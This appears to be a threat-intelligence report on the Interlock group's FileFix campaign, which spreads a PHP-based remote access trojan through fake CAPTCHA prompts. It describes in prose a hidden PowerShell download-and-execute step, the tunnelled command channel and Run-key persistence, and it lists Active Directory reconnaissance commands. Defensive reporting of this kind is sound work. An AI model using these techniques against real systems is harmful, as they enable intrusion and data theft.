FileFix Pushes Interlock RAT with Browser-Triggered PowerShell Execution Chain

A new wave of activity attributed to the Interlock ransomware group has been observed delivering a PHP-based variant of the Interlock remote access trojan (RAT), building on tradecraft used in the ongoing ClickFix campaign. According to findings from The DFIR Report and Proofpoint, this activity surged in May 2025, coinciding with the shift from the ClickFix technique, heavily active since October 2023 to a newer variant called FileFix. FileFix differs by abusing browser-based file explorer functions to initiate execution instead of using the Windows Run dialog. The Interlock RAT campaign has been linked to the KongTuke (aka LandUpdate808) web-inject threat cluster, utilizing injected JavaScript and misleading CAPTCHA verification steps to socially engineer execution. "Proofpoint researchers have observed both Interlock RAT Node.js and Interlock RAT PHP based variants. The Interlock RAT PHP based variant was first spotted in June 2025 campaigns," as reported by The DFIR Report and Proofpoint.

The infection chain starts by coercing users into triggering command execution from the browser file explorer, where a PowerShell script is executed in a hidden window. The script initiates contact with a remote server using DownloadString piped to iex, with no visible prompts. This downloads the Interlock RAT PHP variant, which executes from the user's roaming profile directory using "php.exe," referencing a ".cfg" configuration file. Once active, the malware initiates system reconnaissance with commands such as "systeminfo," "tasklist," "Get-PSDrive," and "Get-Service." Additional hands-on discovery includes Active Directory enumeration via [adsisearcher], "nltest /dclist," and domain enumeration using "net user /domain." These commands are delivered through "cmd.exe /c" and PowerShell.

Interlock RAT establishes command and control via a Cloudflare-based tunnel leveraging trycloudflare[.]com, with hardcoded fallback IPs ensuring resiliency. Commands issued via this channel allow the threat actor to deploy payloads as .exe or .dll files, execute shell commands, and the malware also contains the ability to disable itself via a received OFF command. Persistence is set through the user’s Run key, referencing the RAT’s PHP loader and configuration file. Post-compromise activity includes RDP-based lateral movement, supported by earlier discovery of valid credentials and domain structures. As the campaign leverages variations of a prominent attack technique and has evolved with iterations recently in May and June 2025—using both Node.js and PHP-based variants—monitoring threat behaviors by the Interlock group remains critical given the sustained activity of this threat.